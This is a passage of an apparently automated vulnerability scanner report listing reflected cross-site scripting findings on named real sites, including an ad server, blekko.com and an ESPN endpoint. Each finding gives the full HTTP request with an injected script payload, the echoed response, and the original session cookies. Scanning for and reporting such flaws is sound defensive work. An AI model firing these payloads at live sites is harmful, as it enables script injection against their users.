GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All8a923"><script>alert(1)</script>f5c014234ec/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All8a923"><script>alert(1)</script>f5c014234ec/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1788008593/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.118. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db6d"><script>alert(1)</script>442dc3bf57f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x906db6d"><script>alert(1)</script>442dc3bf57f HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 388
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1700368715/x906db6d"><script>alert(1)</script>442dc3bf57f/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.119. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e08"><script>alert(1)</script>3abd5a56497 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader90e08"><script>alert(1)</script>3abd5a56497/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader90e08"><script>alert(1)</script>3abd5a56497/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/1010444679/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.120. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c89d7"><script>alert(1)</script>b488108a356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATTc89d7"><script>alert(1)</script>b488108a356/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATTc89d7"><script>alert(1)</script>b488108a356/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/1088251137/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.121. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a9a"><script>alert(1)</script>244d439e350 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired97a9a"><script>alert(1)</script>244d439e350/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired97a9a"><script>alert(1)</script>244d439e350/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/384162992/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.122. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 314f5"><script>alert(1)</script>c812b72dfc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt314f5"><script>alert(1)</script>c812b72dfc2/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt314f5"><script>alert(1)</script>c812b72dfc2/All/1b5458553-7549-414b-83d2-2100a7556d38/636339535/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.123. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c314"><script>alert(1)</script>d3932d3a3a7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All6c314"><script>alert(1)</script>d3932d3a3a7/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All6c314"><script>alert(1)</script>d3932d3a3a7/1b5458553-7549-414b-83d2-2100a7556d38/503112095/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.124. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebaa7"><script>alert(1)</script>878d79ae95a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90ebaa7"><script>alert(1)</script>878d79ae95a HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 387
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/377266009/x90ebaa7"><script>alert(1)</script>878d79ae95a/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.125. http://blekko.com/autocomplete [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload e866e<script>alert(1)</script>3984cec7a15 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=ze866e<script>alert(1)</script>3984cec7a15 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=463861018; t=1303228691012; suggestedSlashtagsList=1; v=3; fbl=2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Apr 2011 16:00:52 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Wed, 20 Apr 2011 04:00:52 GMT
Vary: Accept-Encoding
Content-Length: 71
X-Blekko-PT: 4795d055b6321d27f2aa13aa24f30218

{"suggestions":[],"query":"ze866e<script>alert(1)</script>3984cec7a15"}

3.126. http://broadband.espn.go.com/espn3/auth/espnnetworks/user [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://broadband.espn.go.com
Path:   /espn3/auth/espnnetworks/user

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4d851<script>alert(1)</script>bb63329db8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /espn3/auth/espnnetworks/user?callback=jsonp12984973704964d851<script>alert(1)</script>bb63329db8 HTTP/1.1
Host: broadband.espn.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; userAB=F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 104
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-09/10

jsonp12984973704964d851<script>alert(1)</script>bb63329db8(
{ "espn3":"invalid", "networks":"invalid" })

3.127. http://core.insightexpressai.com/adServer/GetInvite2.aspx [adexpansion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the adexpansion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ff3f'-alert(1)-'389354f97e7 was submitted in the adexpansion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=05ff3f'-alert(1)-'389354f97e7&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:19 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
TimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=05ff3f'-alert(1)-'389354f97e7&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.P
...[SNIP]...

3.128. http://core.insightexpressai.com/adServer/GetInvite2.aspx [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b9b'-alert(1)-'f3000b47a8f was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=012b9b'-alert(1)-'f3000b47a8f&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:29 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
